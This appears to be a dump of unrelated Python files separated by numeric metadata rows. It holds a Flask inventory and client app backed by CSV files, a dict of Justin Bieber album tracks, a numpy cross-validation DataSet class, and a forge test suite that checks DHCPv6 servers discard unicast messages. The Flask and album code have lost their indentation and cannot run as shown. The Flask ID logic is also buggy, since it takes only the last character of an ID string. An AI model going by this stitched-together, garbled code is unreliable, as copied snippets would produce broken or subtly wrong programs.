fieldnames =("ID", "NOMBRE", "TIPO", "CANTIDAD", "PRECIO_COMPRA", "PRECIO_VENTA", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, delimiter=";"):
if rowacp["ID"] == rproducto: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['CANTIDAD'] = int(rowacp['CANTIDAD']) - int(rcantidad)
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'TIPO': rowacp['TIPO'], 'CANTIDAD': rowacp['CANTIDAD'], 'PRECIO_COMPRA': rowacp['PRECIO_COMPRA'], 'PRECIO_VENTA': rowacp['PRECIO_VENTA'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaInventario.csv')
with open(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, delimiter=";", quotechar=";",
fieldnames =("ID", "PRODUCTO", "CLIENTE", "CANTIDAD", "PRECIO", "TOTAL", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, delimiter=";"):
if rowbp["ID"] != ridVenta: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaVentas.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaVentas.csv')
return json.dumps(1);
@app.route('/cliente.html')
def cliente():
if 'loginC' in session:
if session['loginC']:
valido = False
with open(os.getcwd()+'/Python3_SGE/datos/listaDepartamentos.csv', 'r', encoding="ISO-8859-15") as File:
reader = csv.reader(File, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
for row in reader: #Comprobamos si el usuario logueado tiene permisos para usar este modulo
if row[0] == "3":
for i in row[2]:
if i == session['idUser']:
valido = True
if valido:
return render_template('cliente.html')
else:
return render_template('inicio.html')
else:
return render_template('index.html')
else:
return render_template('index.html')
@app.route('/cargarClientes', methods=['POST'])
def cargarClientes():
listaDatos = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as lc:
readerlc = csv.reader(lc, delimiter=';', quotechar=';',
quoting=csv.QUOTE_MINIMAL)
next(readerlc)
index = 0 #Cantidad de elementos que tiene el archivo listaCompra.csv
borrarP = 2 #Posicion en la que borrar el id del proveedor
borrarI = 1 #Posicion en la que borrar el id del invenario
for rowlc in readerlc:
datos = []
for i in rowlc:
datos.append(i)
listaDatos.append(datos)
return json.dumps({'datos':listaDatos})
@app.route('/newCliente', methods=['POST'])
def newCliente():
result = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES"), quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
readercp = csv.DictReader(inp, dialect='unix', delimiter=";") #Leer archivo viejo
for rowcp in readercp:
result.append(rowcp) #Guardamos los datos del archivo viejo en una lista
ID = 0
try:
ID = int((int(rowcp['ID'][-1]) + 1)) #Recogemos el id del ultimo elemento del archivo y le sumamos 1
except NameError:
ID = 1 #Si no hay ningun elemento en el archivo ponemos el id a 1
nombre = request.form['nombreCliente']
direccion = request.form['calleCliente']
telefono = request.form['telefonoCliente']
controles = '<button onclick="modificar({})" class="btn btn btn-outline-warning" type="button">Modificar</button><button onclick="borrar({})" class="btn btn btn-outline-danger mt-2" type="button">Borrar</button>'.format(ID, ID)
data = {'ID': ID, 'NOMBRE': nombre, "DIRECCION": direccion, "TELEFONO": telefono, "CONTROLES": controles}
result.append(data) #Añadimos el nuevo elemento a la lista
writer.writerows(result) #Añadimos los datos de la lista en el nuevo archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
return json.dumps(1);
@app.route('/borrarCliente', methods=['POST'])
def borrarCliente():
idCliente = request.form['idCliente']
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader() #Evitamos borrar los titulos (fieldnames)
for rowbp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowbp["ID"] != idCliente: #Creamos el nuevo archivo con todos los datos menos la fila con el id devuelto
writer.writerow(rowbp)
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv') #Removemos el anterior archivo
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv') #Cambiamos el nombre del nuevo archivo al nombre del anterior
return json.dumps(1);
@app.route('/verCliente', methods=['POST'])
def verCliente():
idCliente = request.form['idCliente']
datosP = []
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp:
for rowvp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowvp["ID"] == idCliente: #Añadimos los datos del elemento seleccionado(id) a la lista
datosP.append(rowvp['ID'])
datosP.append(rowvp['NOMBRE'])
datosP.append(rowvp['DIRECCION'])
datosP.append(rowvp['TELEFONO'])
return json.dumps({'datos':datosP}) #Devolvemos los datos en forma json
@app.route('/actualizarCliente', methods=['POST'])
def actualizarCliente():
with open(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv', 'r', encoding="ISO-8859-15") as inp, open(os.getcwd()+'/Python3_SGE/datos/new.csv', 'w', encoding="ISO-8859-15") as out:
writer = csv.DictWriter(out, dialect='unix', delimiter=";", quotechar=";",
fieldnames =("ID", "NOMBRE", "DIRECCION", "TELEFONO", "CONTROLES") , quoting=csv.QUOTE_MINIMAL)
writer.writeheader()
for rowacp in csv.DictReader(inp, dialect='unix', delimiter=";"):
if rowacp["ID"] == request.form['idCliente']: #Cambiamos los datos del elemto seleccionado(id) a los nuevos datos
rowacp['NOMBRE'] = request.form['nCliente']
rowacp['DIRECCION'] = request.form['cCliente']
rowacp['TELEFONO'] = request.form['tCliente']
rowacp = {'ID': rowacp['ID'], 'NOMBRE': rowacp['NOMBRE'], 'DIRECCION': rowacp['DIRECCION'], 'TELEFONO': rowacp['TELEFONO'], 'CONTROLES': rowacp['CONTROLES']}
#Añadimos esos datos al rowacp
writer.writerow(rowacp) #Añadimos los datos el archivo
os.remove(os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
os.rename(os.getcwd()+'/Python3_SGE/datos/new.csv', os.getcwd()+'/Python3_SGE/datos/listaClientes.csv')
return json.dumps(1);
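# Illustrative helper, not part of the original app: every delete/update route above repeats the same
# pattern -- stream the current CSV into new.csv while dropping or rewriting rows, then replace the
# original file. A generic sketch of that pattern (the ';' delimiter and ISO-8859-15 encoding mirror the
# routes above):
def rewrite_csv_sketch(path, fieldnames, transform):
    """Rewrite `path` in place; `transform(row)` returns the new row dict, or None to drop the row."""
    tmp_path = path + '.new'
    with open(path, 'r', encoding="ISO-8859-15") as inp, open(tmp_path, 'w', encoding="ISO-8859-15", newline='') as out:
        writer = csv.DictWriter(out, delimiter=";", fieldnames=fieldnames, quoting=csv.QUOTE_MINIMAL)
        writer.writeheader()
        for row in csv.DictReader(inp, delimiter=";"):
            new_row = transform(row)
            if new_row is not None:
                writer.writerow(new_row)
    os.remove(path)
    os.rename(tmp_path, path)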
# Application entry point.
if __name__ == "__main__":
app.run()
| 34.167492
| 233
| 0.676922
| 5,431
| 41,411
| 5.118026
| 0.060394
| 0.033674
| 0.063139
| 0.075766
| 0.853036
| 0.849978
| 0.849978
| 0.846525
| 0.839042
| 0.831163
| 0
| 0.018653
| 0.155925
| 41,411
| 1,212
| 234
| 34.167492
| 0.776563
| 0.135254
| 0
| 0.762712
| 0
| 0.006519
| 0.267574
| 0.12527
| 0
| 0
| 0
| 0.000825
| 0
| 1
| 0.050847
| false
| 0.001304
| 0.002608
| 0
| 0.139505
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
764ffb54ab7e04bdd068c3909e0d4025b5bceaf7
| 3,048
|
py
|
Python
|
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Nikki_L/DataStructure1-iTunes.py
|
ArtezGDA/text-IO
|
b9ed7f2433c0eda08fb45d125ea22a5fdeaef667
|
[
"MIT"
] | null | null | null |
Muziek = {
'albums': [
{
'title': "Purpose",
'artist': "Justin Bieber",
'tracks': [
{
'track':"1-8",
'titel': "Mark my word",
'airdate': "2015",
'duur':"4:36"
},
{
'track':"2-8",
'titel': "Ill Show You",
'airdate': "2015",
'duur':"4:21"
},
{
'track':"3-8",
'titel': "What Do You Mean",
'airdate': "2015",
'duur':"3:58"
},
{
'track':"4-8",
'titel': "Sorry",
'airdate': "2015",
'duur':"5:40"
},
{
'track':"5-8",
'titel': "Love Yourself",
'airdate': "2015",
'duur':"3:50"
},
{
'track':"6-8",
'titel': "Company",
'airdate': "2015",
'duur':"4:30"
},
{
'track':"7-8",
'titel': "No Pressure",
'airdate': "2015",
'duur':"4:35"
},
{
'track':"8-8",
'titel': "No Sense",
'airdate': "2015",
'duur':"3:58"
}
]
},
{
'title': "Jurnals",
'artist': "Justin Bieber",
'tracks': [
{
'track':"1-6",
'titel': "Heartbreaker",
'airdate': "2014",
'duur':"3:05"
},
{
'track':"2-6",
'titel': "All That Matters",
'airdate': "2014",
'duur':"2:46"
},
{
'track':"3-6",
'titel': "Hold Tight",
'airdate': "2014",
'duur':"2:00"
},
{
'track':"4-6",
'titel': "Recovery",
'airdate': "2014",
'duur':"2:30"
},
{
'track':"5-6",
'titel': "Bad Day",
'airdate': "2014",
'duur':"2:43"
},
{
'track':"6-6",
'titel': "All Bad",
'airdate': "2014",
'duur':"4:20"
}
]
},
        {
        }
    ]
}
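# Illustrative usage, not part of the original file: walk the nested structure and print every track
# (assumes the dictionary is closed as above; the trailing empty album entry is skipped).
for album in Muziek['albums']:
    if not album:
        continue
    print(album['title'], '-', album['artist'])
    for track in album['tracks']:
        print(' ', track['track'], track['titel'], track['duur'])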
| 3,048
| 3,048
| 0.207677
| 169
| 3,048
| 3.745562
| 0.35503
| 0.075829
| 0.189573
| 0.101106
| 0.151659
| 0.094787
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0.648622
| 3,048
| 1
| 3,048
| 3,048
| 0.473389
| 0
| 0
| 0.2
| 0
| 0
| 0.2204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
769580a0c6b3c6598252a47db993516fdf0775ed
| 10,723
|
py
|
Python
|
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | 6
|
2018-10-04T08:40:25.000Z
|
2020-09-07T21:42:10.000Z
|
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | null | null | null |
UI/Lib/mydataset.py
|
AIandSocialGoodLab/PAWS
|
0a386ab99b98f9aba0653c16c6cfd867a47042a4
|
[
"MIT"
] | 5
|
2018-06-17T18:08:32.000Z
|
2019-10-03T01:41:52.000Z
|
import numpy as np
class DataSet(object):
def __init__(self, positive, negative, fold_num):
'''Prepare data. Several folds for pos and neg.'''
self.positive = np.array(positive)
self.negative = np.array(negative)
self.fold_num = fold_num
index = np.random.permutation(len(self.positive))
self.positive = self.positive[index]
index = np.random.permutation(len(self.negative))
self.negative = self.negative[index]
self.data_folds = []
self.label_folds = []
fold_pos_num = int(len(self.positive) / int(fold_num))
fold_neg_num = int(len(self.negative) / int(fold_num))
for i in range(fold_num):
if i == fold_num - 1:
pos = self.positive[i * fold_pos_num:]
neg = self.negative[i * fold_neg_num:]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
else:
pos = self.positive[i * fold_pos_num:(i + 1) * fold_pos_num]
neg = self.negative[i * fold_neg_num:(i + 1) * fold_neg_num]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
def update_negative(self, negative):
self.negative = np.array(negative)
index = np.random.permutation(len(self.negative))
self.negative = self.negative[index]
fold_num = self.fold_num
self.data_folds = []
self.label_folds = []
fold_pos_num = int(len(self.positive) / int(fold_num))
fold_neg_num = int(len(self.negative) / int(fold_num))
for i in range(fold_num):
if i == fold_num - 1:
pos = self.positive[i * fold_pos_num:]
neg = self.negative[i * fold_neg_num:]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
else:
pos = self.positive[i * fold_pos_num:(i + 1) * fold_pos_num]
neg = self.negative[i * fold_neg_num:(i + 1) * fold_neg_num]
data = np.concatenate((pos, neg), axis=0)
label = np.array([1.] * len(pos) + [0.] * len(neg))
index = np.random.permutation(len(data))
self.data_folds.append(data[index])
self.label_folds.append(label[index])
def get_train_test(self, fold_id):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data = data_folds_copy.pop(fold_id)
test_label = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
return train_data, train_label, test_data, test_label
def get_train_test_upsample(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data = data_folds_copy.pop(fold_id)
test_label = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_all(self):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
return train_data, train_label
# used by make_data_pandas.py
def get_train_all_up(self, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up
def get_train_neg_traintest_pos(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_neg_traintest_pos_smote(self, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
train_data_pos = []
train_label_pos = []
for data, label in zip(train_data, train_label):
if label:
train_data_pos += [data]
train_label_pos += [label]
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
train_data_pos = np.array(train_data_pos)
train_label_pos = np.array(train_label_pos)
idx_sort = np.argsort(np.sum(np.square(
np.expand_dims(train_data_pos, 2) - np.tile(train_data_pos, (train_data_pos.shape[0], 1)).reshape(train_data_pos.shape + (train_data_pos.shape[0],))), axis=1), axis=1)
for j, (data, label) in enumerate(zip(train_data_pos, train_label_pos)):
for i in range(num):
a = np.random.uniform(0, 1)
idx = np.random.randint(len(train_data_pos))
train_data_up += [data * a +
(1 - a) * train_data_pos[idx_sort[j, idx]]]
train_label_up += [label]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
def get_train_all_up_aug(self, UdataPos, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
train_data_up = []
train_label_up = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
label1 = label
else:
train_data_up.append(data)
train_label_up.append(label)
for data in UdataPos:
train_data_up += [data]
train_label_up += [label1]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up
# Used by dt method
def get_train_neg_traintest_pos_aug(self, cluster_ids, cluster_ids50, index, UnknownData, UnknownDataID, fold_id, num):
data_folds_copy = list(self.data_folds)
label_folds_copy = list(self.label_folds)
test_data1 = data_folds_copy.pop(fold_id)
test_label1 = label_folds_copy.pop(fold_id)
train_data = np.concatenate(data_folds_copy, axis=0)
train_label = np.concatenate(label_folds_copy, axis=0)
UdataPos = []
for i, id in enumerate(UnknownDataID.reshape(-1)):
if (id in cluster_ids[8] or id in cluster_ids[7] or id in cluster_ids[6]) and (id in cluster_ids50[7] or id in cluster_ids50[6]):
UdataPos.append(UnknownData[i:i + 1, :])
UdataPos = np.concatenate(UdataPos, 0)
print(UdataPos.shape)
train_data_up = []
train_label_up = []
test_data = []
test_label = []
for data, label in zip(train_data, train_label):
if label:
train_data_up += [data] * num
train_label_up += [label] * num
label1 = label
else:
train_data_up.append(data)
train_label_up.append(label)
for data, label in zip(test_data1, test_label1):
if label:
test_data.append(data)
test_label.append(label)
else:
train_data_up.append(data)
train_label_up.append(label)
for data in UdataPos:
train_data_up += [data]
train_label_up += [label1]
train_data_up = np.array(train_data_up)
train_label_up = np.array(train_label_up)
index = np.random.permutation(len(train_label_up))
train_data_up = train_data_up[index]
train_label_up = train_label_up[index]
return train_data_up, train_label_up, test_data, test_label
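# Usage sketch, not part of the original module: build a small synthetic dataset, split it into 5 folds,
# and pull one train/test split. The feature values and the 10x upsampling factor are arbitrary.
if __name__ == '__main__':
    rng = np.random.RandomState(0)
    positive = rng.rand(20, 4)    # 20 positive samples, 4 features each
    negative = rng.rand(200, 4)   # 200 negative samples
    ds = DataSet(positive, negative, fold_num=5)
    train_x, train_y, test_x, test_y = ds.get_train_test(fold_id=0)
    print(train_x.shape, train_y.shape, test_x.shape, test_y.shape)
    up_x, up_y, _, _ = ds.get_train_test_upsample(fold_id=0, num=10)
    print(up_x.shape, up_y.shape)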
| 34.590323
| 175
| 0.675091
| 1,619
| 10,723
| 4.134651
| 0.056208
| 0.108904
| 0.105766
| 0.057365
| 0.881237
| 0.850164
| 0.83179
| 0.819689
| 0.819689
| 0.819689
| 0
| 0.008663
| 0.214119
| 10,723
| 309
| 176
| 34.702265
| 0.785689
| 0.008486
| 0
| 0.841897
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039526
| false
| 0
| 0.003953
| 0
| 0.079051
| 0.003953
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4f11f6c517f23744faf6aa3aca6c993d770d7359
| 34,077
|
py
|
Python
|
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
tests/dhcpv6/address_validation/test_v6_address.py
|
shawnmullaney/forge
|
aaaef0a0645f73d24666aab6a400f3604e753aac
|
[
"0BSD"
] | null | null | null |
"""Standard DHCPv6 address validation"""
# pylint: disable=invalid-name,line-too-long
import pytest
import references
import misc
import srv_control
import srv_msg
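# Each test below follows the same pattern: send the message to a unicast
# destination first (the server is expected to discard it, or to answer with a
# UseMulticast status code in the disabled variants), then repeat the same
# exchange over multicast and check the options in the ADVERTISE/REPLY.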
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_solicit():
# Server MUST discard any Solicit it receives with
# a unicast address destination
# Message details Client Server
# GLOBAL_UNICAST dest SOLICIT -->
# X ADVERTISE
# correct message SOLICIT -->
# <-- ADVERTISE
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
# Server is configured with 3000::/64 subnet with 3000::1-3000::ff pool.
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_confirm():
# Server MUST discard any Confirm it receives with
# a unicast address destination
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL_UNICAST dest CONFIRM -->
# X REPLY
# correct message CONFIRM -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
# Server is configured with 3000::/64 subnet with 3000::1-3000::ff pool.
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
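# 'DONT ' appears to tell forge to keep the saved options for reuse in the
# follow-up message (an assumption based on the paired
# client_add_saved_option(None) call below).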
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('CONFIRM')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '13')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_rebind():
# Server MUST discard any Rebind it receives with
# a unicast address destination.
# Message details Client Server
# SOLICIT -->
# <-- ADVERTISE
# REQUEST -->
# <-- REPLY
# GLOBAL_UNICAST dest REBIND -->
# X REPLY
# correct message REBIND -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
# IA-NA
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.build_and_send_config_files('SSH', 'config-file')
srv_control.start_srv('DHCP', 'started')
misc.test_procedure()
srv_msg.client_requests_option('7')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_does_include('Client', None, 'IA-NA')
srv_msg.client_send_msg('SOLICIT')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'ADVERTISE')
srv_msg.response_check_include_option('Response', None, '3')
srv_msg.response_check_option_content('Response', '3', None, 'sub-option', '5')
misc.test_procedure()
srv_msg.client_copy_option('IA_NA')
srv_msg.client_copy_option('server-id')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REQUEST')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
misc.test_procedure()
srv_msg.unicast_addres('GLOBAL', None)
srv_msg.client_save_option('IA_NA')
srv_msg.client_add_saved_option('DONT ')
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_dont_wait_for_message()
misc.test_procedure()
srv_msg.client_add_saved_option(None)
srv_msg.client_does_include('Client', None, 'client-id')
srv_msg.client_send_msg('REBIND')
misc.pass_criteria()
srv_msg.send_wait_for_message('MUST', None, 'REPLY')
srv_msg.response_check_include_option('Response', None, '1')
srv_msg.response_check_include_option('Response', None, '2')
srv_msg.response_check_include_option('Response', None, '3')
references.references_check('RFC3315')
@pytest.mark.basic
@pytest.mark.v6
@pytest.mark.dhcp6
@pytest.mark.unicast
def test_v6_basic_message_unicast_global_inforequest():
# Server MUST discard any Information-Request it receives with
# a unicast address destination.
# Message details Client Server
# GLOBAL_UNICAST dest INFOREQUEST -->
# X REPLY
# correct message INFOREQUEST -->
# <-- REPLY
# Pass Criteria:
# REPLY MUST include option:
# client-id
# server-id
misc.test_setup()
srv_control.config_srv_subnet_with_iface('$(SERVER_IFACE)',
'$(SRV_IPV6_ADDR_GLOBAL)',
'3000::/64',
'3000::1-3000::ff')
srv_control.config_srv_opt('preference', '123')
srv_control.build_and_send_config_files('SSH', 'config-file')
